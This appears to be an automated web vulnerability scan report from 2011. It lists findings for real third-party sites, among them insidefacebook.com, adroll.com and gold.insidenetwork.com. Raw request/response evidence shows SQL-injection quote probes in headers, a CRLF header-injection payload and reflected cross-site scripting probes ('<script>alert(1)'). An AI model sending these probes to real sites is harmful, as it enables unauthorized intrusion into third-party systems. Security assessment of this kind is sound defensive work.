1.1. http://www.insidefacebook.com/adtracker2/ads.php [Referer HTTP header]
1.2. http://www.insidefacebook.com/adtracker2/ads.php [User-Agent HTTP header]
1.3. http://www.insidefacebook.com/adtracker2/ads.php [s parameter]
2.1. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 2]
2.2. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA [REST URL parameter 3]
3. Cross-site scripting (reflected)
3.1. http://gold.insidenetwork.com/facebook/ [name of an arbitrarily supplied request parameter]
3.13. http://www.criteo.com/templates/criteo/js/script.php [templateImagePath parameter]
3.15. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [campaign parameter]
3.17. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [ls parameter]
3.19. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [sd parameter]
3.20. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_campaign parameter]
3.21. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_content parameter]
3.22. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_medium parameter]
3.23. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_source parameter]
3.24. http://www.votigo.com/corp/solutions/fbcontests.php [insidefacebook parameter]
4.1. http://dis.us.criteo.com/crossdomain.xml
4.2. http://bstats.adbrite.com/crossdomain.xml
4.3. http://cdn.shoutlet.com/crossdomain.xml
4.4. http://feeds.bbci.co.uk/crossdomain.xml
4.5. http://googleads.g.doubleclick.net/crossdomain.xml
4.6. http://newsrss.bbc.co.uk/crossdomain.xml
4.7. http://static.ak.fbcdn.net/crossdomain.xml
4.8. http://track.lfstmedia.com/crossdomain.xml
4.9. http://www.facebook.com/crossdomain.xml
4.10. http://www.lifestreetmedia.com/crossdomain.xml
4.11. http://www.votigo.com/crossdomain.xml
4.12. http://www.youtube.com/crossdomain.xml
4.13. http://hubspot.app1.hubspot.com/crossdomain.xml
5. Cleartext submission of password
5.1. http://gold.insidenetwork.com/facebook/
5.2. http://my.lifestreetmedia.com/login/register/
5.3. http://publishers.criteo.com/signup.aspx
6.1. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
6.2. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
7. SSL cookie without secure flag set
8.1. http://www.criteo.com/index.php
8.2. http://www.facebook.com/extern/login_status.php
8.3. http://www.hubspot.com/free-trial/Default.aspx
9. Password field submitted using GET method
10. Cookie scoped to parent domain
10.1. http://www.invisionpower.com/hosting/advanced.php
10.2. http://www.invisionpower.com/products/board/
10.3. http://www.invisionpower.com/suite/demo.php
10.4. https://www.invisionpower.com/clients/index.php
10.5. http://affiliate.invisionpower.com/scripts/track.php
10.6. http://bstats.adbrite.com/click/bstats.gif
10.7. http://dis.us.criteo.com/dis/dis.aspx
10.8. http://id.google.com/verify/EAAAAGvlWCaflY7x5P9Q8kubShs.gif
10.9. http://track.lfstmedia.com/cmp698
11. Cookie without HttpOnly flag set
11.1. http://chat.livechatinc.net/licence/1043255/script.cgi
11.3. http://gold.insidenetwork.com/facebook/
11.4. http://www.conversionruler.com/bin/js.php
11.5. http://www.conversionruler.com/bin/tracker.php
11.6. https://www.invisionpower.com/clients/index.php
11.7. http://affiliate.invisionpower.com/scripts/track.php
11.8. http://bstats.adbrite.com/click/bstats.gif
11.9. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
11.10. http://community.invisionpower.com/files/
11.11. http://community.invisionpower.com/files/file/4226-rsyvarth-social-groups/
11.13. http://cpm.criteo.com/favicon.ico
11.14. http://cpm.criteo.com/lp/css/general.css
11.15. http://cpm.criteo.com/lp/img/adw_header_us.jpg
11.16. http://cpm.criteo.com/lp/img/bckgrd_gradient.png
11.17. http://cpm.criteo.com/lp/img/booking_160600.jpg
11.18. http://cpm.criteo.com/lp/img/btn_2.gif
11.19. http://cpm.criteo.com/lp/img/callaway_160600.png
11.20. http://cpm.criteo.com/lp/img/de_flag.gif
11.21. http://cpm.criteo.com/lp/img/fr_flag.gif
11.22. http://cpm.criteo.com/lp/img/it_flag.gif
11.23. http://cpm.criteo.com/lp/img/logo_cpm.png
11.24. http://cpm.criteo.com/lp/img/overstock_us_160600.png
11.25. http://cpm.criteo.com/lp/img/puce_1.gif
11.26. http://cpm.criteo.com/lp/img/quote_1_uk.jpg
11.27. http://cpm.criteo.com/lp/img/quote_2_uk.jpg
11.28. http://cpm.criteo.com/lp/img/quote_3_uk.jpg
11.29. http://cpm.criteo.com/lp/img/sep_bas.gif
11.30. http://cpm.criteo.com/lp/img/sep_centre.gif
11.31. http://cpm.criteo.com/lp/img/sep_haut.gif
11.32. http://cpm.criteo.com/lp/img/uk_flag.gif
11.33. http://cpm.criteo.com/lp/img/us_flag.gif
11.34. http://cpm.criteo.com/lp/img/zappos_160600.png
11.35. http://cpm.criteo.com/lp/scripts/jquery-1.4.2.js
11.36. http://cpm.criteo.com/lp/scripts/jquery.innerfade.js
11.37. http://cpm.criteo.com/lp/web_us.html
11.38. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA
11.39. http://dis.us.criteo.com/dis/dis.aspx
11.40. http://hubspot.app1.hubspot.com/salog.js.aspx
11.42. http://my.lifestreetmedia.com/login/register/
11.43. http://publishers.criteo.com/signup.aspx
11.44. http://track.lfstmedia.com/cmp698
11.46. http://www.criteo.com/components/com_joomfish/images/flags/au.gif
11.47. http://www.criteo.com/components/com_joomfish/images/flags/de.gif
11.48. http://www.criteo.com/components/com_joomfish/images/flags/en.gif
11.49. http://www.criteo.com/components/com_joomfish/images/flags/es.gif
11.50. http://www.criteo.com/components/com_joomfish/images/flags/fr.gif
11.51. http://www.criteo.com/components/com_joomfish/images/flags/it.gif
11.52. http://www.criteo.com/components/com_joomfish/images/flags/ko.gif
11.53. http://www.criteo.com/components/com_joomfish/images/flags/nl.gif
11.54. http://www.criteo.com/components/com_joomfish/images/flags/us.gif
11.55. http://www.criteo.com/favicon.ico
11.56. http://www.criteo.com/images/banners/en-us/footerlogos_nai.gif
11.57. http://www.criteo.com/images/banners/en-us/footerlogos_truste.gif
11.58. http://www.criteo.com/images/banners/en-us/iab-memberseal-white.gif
11.59. http://www.criteo.com/images/banners/en-us/irce2011_logo.jpg
11.60. http://www.criteo.com/images/home/step1.gif
11.61. http://www.criteo.com/images/home/step2.gif
11.62. http://www.criteo.com/images/home/step3.gif
11.63. http://www.criteo.com/images/home/step4.gif
11.64. http://www.criteo.com/index.php
11.65. http://www.criteo.com/media/system/js/caption.js
11.66. http://www.criteo.com/media/system/js/mootools.js
11.67. http://www.criteo.com/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css
11.68. http://www.criteo.com/templates/criteo/css/home.css
11.69. http://www.criteo.com/templates/criteo/css/main.css
11.70. http://www.criteo.com/templates/criteo/favicon.ico
11.71. http://www.criteo.com/templates/criteo/images/backgrounds/button.gif
11.72. http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_left.gif
11.73. http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_right.gif
11.74. http://www.criteo.com/templates/criteo/images/backgrounds/footer.gif
11.75. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomleft.gif
11.76. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomright.gif
11.77. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topleft.gif
11.78. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topright.gif
11.79. http://www.criteo.com/templates/criteo/images/backgrounds/languages.gif
11.80. http://www.criteo.com/templates/criteo/images/backgrounds/languages_wrapper.gif
11.81. http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_left.gif
11.82. http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_right.gif
11.83. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomleft.gif
11.84. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomright.gif
11.85. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topleft.gif
11.86. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topright.gif
11.87. http://www.criteo.com/templates/criteo/images/home/body.gif
11.88. http://www.criteo.com/templates/criteo/images/home/home-blue.jpg
11.89. http://www.criteo.com/templates/criteo/images/home/slide_arrow.gif
11.90. http://www.criteo.com/templates/criteo/images/home/tab_how.gif
11.91. http://www.criteo.com/templates/criteo/images/home/tab_how_wrapper.gif
11.92. http://www.criteo.com/templates/criteo/images/home/tab_left.gif
11.93. http://www.criteo.com/templates/criteo/images/home/tab_right.gif
11.94. http://www.criteo.com/templates/criteo/images/logo.gif
11.95. http://www.criteo.com/templates/criteo/js/script.php
11.96. http://www.criteo.com/templates/criteo/js/slides.js
11.97. http://www.criteo.com/templates/criteo/js/steps.js
11.98. http://www.criteo.com/templates/criteo/js/successstories.js
11.99. http://www.criteo.com/templates/criteo/js/swfobject.js
11.100. http://www.criteo.com/templates/criteo/js/tabs.js
11.101. http://www.criteo.com/templates/criteo/js/validation.js
11.102. http://www.hubspot.com/Portals/53/images/HubSpot_Software.png
11.103. http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.css
11.104. http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.custom.css
11.105. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.custom.js
11.106. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.js
11.107. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jcarousel.min.js
11.108. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.js
11.109. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.ui.js
11.110. http://www.hubspot.com/RadControls/Menu/Skins/Blank/styles.css
11.111. http://www.hubspot.com/WebResource.axd
11.112. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
11.113. http://www.hubspot.com/portals/53/skins/hubspot/app/img/map.png
11.114. http://www.hubspot.com/sw/website/web-all.css
11.115. http://www.hubspot.com/sw/website/web-all.js
11.116. http://www.lifestreetmedia.com/
11.117. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
11.118. http://www.votigo.com/
11.119. http://www.votigo.com/corp/solutions/fbcontests.php
12. Password field with autocomplete enabled
12.1. http://gold.insidenetwork.com/facebook/
12.2. http://my.lifestreetmedia.com/login/register/
12.3. http://publishers.criteo.com/signup.aspx
13.1. http://community.invisionpower.com/index.php
13.2. http://community.invisionpower.com/public/js/3rd_party/prettify/prettify.js
14. Referer-dependent response
14.1. http://bstats.adbrite.com/click/bstats.gif
14.2. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
14.3. http://community.invisionpower.com/index.php
14.4. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA
14.5. http://www.conversionruler.com/bin/tracker.php
14.6. http://www.facebook.com/plugins/like.php
14.7. http://www.youtube.com/v/m0UQucWM0Zw
15.2. http://www.insidefacebook.com/
15.4. http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif
15.5. http://www.insidemobileapps.com/advertise-with-us/
15.6. http://www.invisionpower.com/hosting/advanced.php
15.7. http://www.invisionpower.com/products/board/
15.8. http://www.invisionpower.com/suite/demo.php
15.9. https://www.invisionpower.com/clients/index.php
15.10. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
16. Cross-domain Referer leakage
16.1. http://cdn.shoutlet.com/static/flash/swfjs/
16.2. http://cdn.shoutlet.com/widgets/
16.3. http://www.facebook.com/plugins/like.php
16.4. http://www.facebook.com/plugins/like.php
16.5. http://www.google.com/search
16.6. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
16.7. http://www.hubspot.com/free-trial/Default.aspx
16.8. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
16.9. http://www.shoutlet.com/features/landingpage.php
16.10. http://www.votigo.com/corp/solutions/fbcontests.php
17. Cross-domain script include
17.1. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
17.2. http://my.lifestreetmedia.com/login/register/
17.3. http://www.facebook.com/plugins/like.php
17.5. http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
17.6. http://www.hubspot.com/free-trial/
17.7. http://www.hubspot.com/free-trial/Default.aspx
17.8. http://www.hubspot.com/portals/53/skins/hubspot/search.html
17.9. http://www.insidefacebook.com/
17.11. http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif
17.12. http://www.insidemobileapps.com/advertise-with-us/
17.13. http://www.lifestreetmedia.com/
17.14. http://www.rightscale.com/index.php
17.15. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
17.16. http://www.shoutlet.com/
17.17. http://www.shoutlet.com/features/landingpage.php
17.18. http://www.votigo.com/corp/img/panel.jpg
18.1. http://743-ngz-698.mktoresp.com/
18.2. http://affiliate.invisionpower.com/
18.3. http://community.invisionpower.com/
18.5. http://tracking.hubspot.com/
18.6. http://www.conversionruler.com/
18.8. http://www.invisionpower.com/
18.9. https://www.invisionpower.com/
18.10. http://www.rightscale.com/
18.11. http://www.shoutlet.com/
19.1. http://bstats.adbrite.com/click/bstats.gif
19.2. http://bstats.adbrite.com/click/bstats.gif
19.3. http://bstats.adbrite.com/click/bstats.gif
19.4. http://bstats.adbrite.com/click/bstats.gif
19.5. http://bstats.adbrite.com/click/bstats.gif
19.6. http://bstats.adbrite.com/click/bstats.gif
19.7. http://community.invisionpower.com/
19.8. http://cpm.criteo.com/lp/scripts/jquery.innerfade.js
19.9. http://www.insidefacebook.com/
19.10. http://www.invisionpower.com/suite/demo.php
19.11. http://www.shoutlet.com/
19.12. http://www.votigo.com/corp/css/screen.css
20. Private IP addresses disclosed
20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php
20.2. http://static.ak.fbcdn.net/connect/xd_proxy.php
20.3. http://www.facebook.com/connect.php/js/FB.SharePro/
20.4. http://www.facebook.com/extern/login_status.php
20.5. http://www.facebook.com/extern/login_status.php
20.6. http://www.facebook.com/plugins/like.php
20.7. http://www.facebook.com/plugins/like.php
20.8. http://www.facebook.com/plugins/like.php
20.9. http://www.facebook.com/plugins/like.php
20.10. http://www.votigo.com/corp/solutions/fbcontests.php
21.1. http://743-ngz-698.mktoresp.com/webevents/visitWebPage
21.2. http://cdn.shoutlet.com/static/flash/swfjs/
21.3. http://community.invisionpower.com/
21.4. http://cpm.criteo.com/lp/web_us.html
21.5. http://dis.us.criteo.com/dis/dis.aspx
21.6. http://feeds.bbci.co.uk/news/rss.xml
21.7. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1032613984/
21.8. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
21.9. http://static.ak.fbcdn.net/connect/xd_proxy.php
21.10. http://www.appdata.com/images/appicon.png
21.11. http://www.conversionruler.com/bin/js.php
21.13. http://www.facebook.com/extern/login_status.php
21.14. http://www.google-analytics.com/__utm.gif
21.15. http://www.googleadservices.com/pagead/conversion/1032613984/
21.16. http://www.insidefacebook.com/
21.18. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
21.19. http://www.shoutlet.com/features/landingpage.php
21.20. http://www.youtube.com/v/m0UQucWM0Zw
22. HTML does not specify charset
22.1. http://cdn.shoutlet.com/static/flash/swfjs/
22.2. http://cdn.shoutlet.com/widgets/
22.4. http://www.hubspot.com/portals/53/skins/hubspot/search.html
22.5. http://www.insidefacebook.com/adtracker2/ads.php
22.6. http://www.shoutlet.com/favicon.ico
22.7. http://www.shoutlet.com/features/landingpage.php
22.8. http://www.shoutlet.com/js/prototype.js
22.9. http://www.shoutlet.com/static/js/external.js
22.10. http://www.shoutlet.com/static/js/swfobject.js
23. HTML uses unrecognised charset
24. Content type incorrectly stated
24.1. http://a3.twimg.com/profile_images/357754763/cross_normal.gif
24.2. http://affiliate.invisionpower.com/scripts/track.php
24.3. http://cdn.shoutlet.com/static/flash/swfjs/
24.4. http://cdn.shoutlet.com/widgets/
24.5. http://chat.livechatinc.net/licence/1043255/script.cgi
24.6. http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js
24.7. http://frimastudio.com/favicon.ico
24.8. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico
24.9. http://hubspot.app1.hubspot.com/salog.js.aspx
24.10. http://s3.amazonaws.com/appdata-pro/app_icons/14400961/original.jpg
24.11. http://www.conversionruler.com/bin/tracker.php
24.12. http://www.criteo.com/components/com_joomfish/images/flags/au.gif
24.13. http://www.insidefacebook.com/favicon.ico
24.14. http://www.shoutlet.com/static/img/logos/favicon.ico
24.15. http://www.votigo.com/favicon.ico
Severity: | High |
Confidence: | Tentative |
Host: | http://www.insidefacebook |
Path: | /adtracker2/ads.php |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:59:29 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 23 DB Error: syntax error |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:59:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 192 <html><head><meta http-equiv='refresh' content='0;url=http://cpm |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.insidefacebook |
Path: | /adtracker2/ads.php |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.insidefacebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24' Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:59:18 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 23 DB Error: syntax error |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.insidefacebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'' Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:59:20 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 192 <html><head><meta http-equiv='refresh' content='0;url=http://cpm |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.insidefacebook |
Path: | /adtracker2/ads.php |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.insidefacebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:55:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 23 DB Error: syntax error |
GET /adtracker2/ads.php?a=108 Host: www.insidefacebook.com Proxy-Connection: keep-alive Referer: http://www.insidefacebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=78842188 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:55:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Content-Type: text/html Content-Length: 192 <html><head><meta http-equiv='refresh' content='0;url=http://cpm |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/SNWCKNCH3JFBB |
GET /pixel/d2413%0d%0a8ff5604e1dd/YNYIFZAM3NACFPVLCC56LA Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.hubspot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Sun, 15 May 2011 16:55:46 GMT Connection: keep-alive Set-Cookie: __adroll=a9511c254a1 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel 8ff5604e1dd/YNYIFZAM3NACFPVLCC56LA Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /pixel/SNWCKNCH3JFBB |
GET /pixel/SNWCKNCH3JFBB Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.hubspot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Sun, 15 May 2011 16:56:22 GMT Connection: keep-alive Set-Cookie: __adroll=485576eb1a4 Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com 978ff2227b8/pixel.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/ |
GET /facebook/?b1300"><script>alert(1)< Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://www.insidefacebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 16:54:10 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=a1ck6as538 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 12085 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-contenteba3c"><script>alert(1)< Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://gold.insidenetwork User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 16:57:29 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 16:57:29 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8817 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://gold.insidenetwork User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 16:58:17 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 16:58:17 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8817 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://gold.insidenetwork User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 16:59:07 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 16:59:07 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8817 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://gold.insidenetwork User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 16:59:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 16:59:53 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8817 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Referer: http://gold.insidenetwork User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
